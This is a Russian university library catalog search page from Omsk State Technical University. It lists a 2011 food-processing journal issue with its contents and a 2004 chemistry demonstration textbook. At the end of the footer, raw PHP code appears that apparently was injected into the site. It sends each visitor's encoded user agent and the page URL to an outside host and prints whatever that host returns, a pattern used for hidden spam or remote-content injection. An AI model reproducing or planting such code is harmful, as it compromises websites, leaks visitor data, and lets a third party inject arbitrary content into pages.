Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

128 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=АКВАКОМПЛЕКС")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 2
1. 
Хранение и переработка сельхозсырья. - Журнал, 2011г. № 6
Оглавление 
  • Параметрическое моделирование состава пищевых продуктов для индивидуального питания. - с.8-10
  • Статистическая оценка кластерной модели гигроскопичности зерна. - с.11-14
  • Кочетов, В. К. Диагностика существующей и новой технологии заварных ферментативных пряников / В. К. Кочетов, Л. М. Аксенова, М. А. Талейсник. - с.14-16
  • Частичная подсушка при очистке корнеплодов методом мгновенного сброса давления. - с.17-18
  • Запорощенко, К. Л. Динамика отмыва загрязнений шерсти в технологии ее промывки / К. Л. Запорощенко, Л. А. Башеева. - с.18-20
  • Филатов, В. В. Методика комплексного определения интегральных оптических характеристик капиллярно-пористых коллоидных структур / В. В. Филатов. - с.21-24
  • Рогожина, Т. В. Использование глицерина для консервирования пантов северного оленя и другого биологического сырья / Т. В. Рогожина, В. В. Рогожин. - с.24-27
  • Антиоксидантные свойства концентрированных экстрактов из продуктов переработки ягод семейства брусничных. - с.27-29
  • Пивоваров, В. Ф. Восстановить технологию и расширить производство сушеного зеленого горошка / В. Ф. Пивоваров, Н. С. Цыганок. - с.30-34
  • Аквакомплекс глицеросольвата титана как стабилизатор активности ферментативных систем в суспензионной среде диоксида кремния. - с.34-36
  • Макарова, Н. В. Антиоксидантные свойства яблочно-ягодных соков с мякотью / Н. В. Макарова, А. В. Зюзина. - с.36-38
  • Технология получения агара из Gracilariaopsis и Gracilaria: сравнительная характеристика способов очистки агаровых экстрактов. - с.39-44
  • Амарант: химический состав, биохимические свойства и способы переработки. - с.44-48
  • Мезенова, О. Я. Хитозан в технологии комплексной переработки молочной сыворотки / О. Я. Мезенова, О. В. Скапец. - с.49-53
  • Грибова, Н. А. Изучение влияния продолжительности хранения после размораживания на потребительские свойства замороженных ягод / Н. А. Грибова. - с.53-54
  • Шарова, Н. Ю. Влияние ультразвука на микрофлору ферментационной системы для биосинтеза лимонной кислоты и продуцент Aspergillus niger / Н. Ю. Шарова, Н. В. Каменькова, А. Г. Палаев. - с.55-56
  • Шишков, Ю. И. Статус биологически активной воды в биоценозе микроорганизмов тестовой системы при производстве хлеба / Ю. И. Шишков, Г. Ф. Дремучева, А. П. Косован. - с.57-59
  • Мусина, О. Н. Комплексное монографическое исследование "Комбинированные сыры" (обзор) / О. Н. Мусина. - с.60-63
  • Типсина, Н. Н. Перспективный полуфабрикат из мелкоплодных яблок Сибири / Н. Н. Типсина, Н. В. Присухина, А. Е. Туманова. - с.64-66
  • Разработка кисломолочного продукта с использованием отвара мяты. - с.67-68
  • Алиев, М. Р. Расчет непрерывной обработки текучей среды тонкодисперсным сорбентом в линии реактор-массообменный аппарат / М. Р. Алиев, Р. З. Алиев, А. Р. Алиев. - с.69-73
  • Присяжнюк, Ю. В. О возможности усовершенствования оборудования ударной обработки натуральных кож для повышения их эластичности / Ю. В. Присяжнюк, Л. А. Каплин, А. В. Русский. - с.75-77
  • Кириллов, Н. К. Обработка яиц комплексным воздействием электромагнитных излучений / Н. К. Кириллов, Г. В. Новикова, Е. Л. Белов. - с.73-74
Держатели документа (Информация об экземплярах) 
2. 
Демонстрационные опыты по общей и неорганической химии [Текст] : учеб. пособие для вузов / Б. Д. Степин [и др.] ; под ред. Б. Д. Степина, 2004. - 334, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ОКСИД -- ОКИСЛИТЕЛЬНО-ВОССТАНОВИТЕЛЬНАЯ РЕАКЦИЯ -- ОСАЖДЕНИЕ -- СУСПЕНЗИЯ -- ДИСПЕРСНАЯ -- СИСТЕМА -- РАСТВОР -- ЭМУЛЬСИЯ -- РАСТВОРИМОСТЬ -- КРИСТАЛЛИЗАЦИЯ -- ТЕПЛОВОЙ -- ЭФФЕКТ -- ПРОТОЛИЗ -- ГИДРОЛИЗ -- ВОДОРОД -- ГОРЕНИЕ -- УГЛЕРОД -- КРЕМНИЙ -- БОР -- АЛЮМИНИЙ -- ОЛОВО -- СВИНЕЦ -- АЗОТ -- АММИАК -- СОЛЬ -- ФОСФОР -- СУРЬМА -- ВИСМУТ -- КИСЛОРОД -- СЕРОВОДОРОД -- СЕРА -- СУЛЬФАТ -- ГАЛОГЕН -- ХЛОР -- БРОМ -- ИОД -- ВОЗГОНКА -- АКВАКОМПЛЕКС -- МЕДЬ -- СЕРЕБРО -- ЦИНК -- КАДМИЙ -- РТУТЬ -- ХРОМ -- МАРГАНЕЦ -- ЖЕЛЕЗО -- КОБАЛЬТ -- НИКЕЛЬ -- ТИТАН -- ЦЕРИЙ -- ЦЕРИЙ
Держатели документа (Информация об экземплярах) 

Пособие рассматривает технику и методику демонстрационного эксперимента по общей и неорганической химии и содержит описание более 300 опытов разной степени сложности, которые необходимы при подготовке и проведении как лекционного, так и лабораторного демонстирования опытов в вузах, колледжах, лицеях, других общеобразовательных учебных заведениях всех типов.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3107 - 12.12.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.64 с.14 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;